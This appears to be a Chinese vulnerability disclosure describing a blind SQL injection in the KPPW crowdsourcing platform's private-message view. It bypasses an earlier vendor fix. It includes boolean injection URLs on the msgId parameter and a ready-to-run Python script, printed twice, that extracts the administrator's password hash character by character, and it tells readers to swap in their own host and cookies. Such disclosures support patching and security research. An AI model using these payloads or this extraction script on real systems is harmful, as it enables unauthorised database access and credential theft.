KPPW开源威客系统绕过防护盲注

### 简要描述： KPPW开源威客系统 绕过防护盲注 ### 详细说明： 1. [WooYun: kppw一处sql注入](http://www.wooyun.org/bugs/wooyun-2014-066270) 厂商对这个漏洞进行了修复。替换了union 不能进行联合了 但是可以进行盲注。 同一个类型，多点。不过问题都出在消息这。 2. 注册两个帐号，然后其中一个对另外那个发送3个消息。 [<img src="https://images.seebug.org/upload/201409/202350221c8d983e19466841993b7d6f5369f6af.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/202350221c8d983e19466841993b7d6f5369f6af.png) 3. 打开中间那条 url如下 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 然后尝试注入 [<img src="https://images.seebug.org/upload/201409/2023515522696e6c3b49f424041744d68d55c33b.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2023515522696e6c3b49f424041744d68d55c33b.png) 下面我们可以看到 上一条 和 下一条 。 注入测试 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=1-- [<img src="https://images.seebug.org/upload/201409/20235228b7b2a7bedc5c074508fbbeeae63d45f6.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/20235228b7b2a7bedc5c074508fbbeeae63d45f6.png) 存在。 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=2-- [<img src="https://images.seebug.org/upload/201409/20235256713d0e6d6b6fe504875a82762dbf20ed.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/20235256713d0e6d6b6fe504875a82762dbf20ed.png) 消失了。 3. 主要利用url http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and (select CHAR(48))=SUBSTR((SELECT `password` from keke_witkey_member WHERE uid =1),1,1)-- 下面 写了一个小工具 替换下host url cookies就可以用了。 ``` #coding:utf-8 import httplib def get(i1,i2): page="" rHtml=httplib.HTTPConnection("192.168.1.101",80,False) url="/KPPW/index.php?do=user&view=message&op=detail&type=notice&intPage=1&msgId=13%20and%20%28select%20CHAR%28"+i1+"%29%29=SUBSTR%28%28SELECT%20%60password%60%20from%20keke_witkey_member%20WHERE%20uid%20=1%29,"+i2+",1%29--" #print url rHtml.request("GET",url,headers={"User-Agent":"Firefox/22.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Cookie":"PHPSESSID=x","Connection":"keep-alive"}) page=rHtml.getresponse(False) return page.read().count('一条') mm=[] for i in range(1,33): for ii in range(48,123): if(get(str(ii),str(i))!=0): mm.append(chr(ii)) print "".join(mm) break ``` [<img src="https://images.seebug.org/upload/201409/202354420de9961ebb63f42efa3a0b4c5ca63360.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/202354420de9961ebb63f42efa3a0b4c5ca63360.png) ### 漏洞证明： ``` #coding:utf-8 import httplib def get(i1,i2): page="" rHtml=httplib.HTTPConnection("192.168.1.101",80,False) url="/KPPW/index.php?do=user&view=message&op=detail&type=notice&intPage=1&msgId=13%20and%20%28select%20CHAR%28"+i1+"%29%29=SUBSTR%28%28SELECT%20%60password%60%20from%20keke_witkey_member%20WHERE%20uid%20=1%29,"+i2+",1%29--" #print url rHtml.request("GET",url,headers={"User-Agent":"Firefox/22.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Cookie":"PHPSESSID=x","Connection":"keep-alive"}) page=rHtml.getresponse(False) return page.read().count('一条') mm=[] for i in range(1,33): for ii in range(48,123): if(get(str(ii),str(i))!=0): mm.append(chr(ii)) print "".join(mm) break ``` [<img src="https://images.seebug.org/upload/201409/202354420de9961ebb63f42efa3a0b4c5ca63360.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/202354420de9961ebb63f42efa3a0b4c5ca63360.png)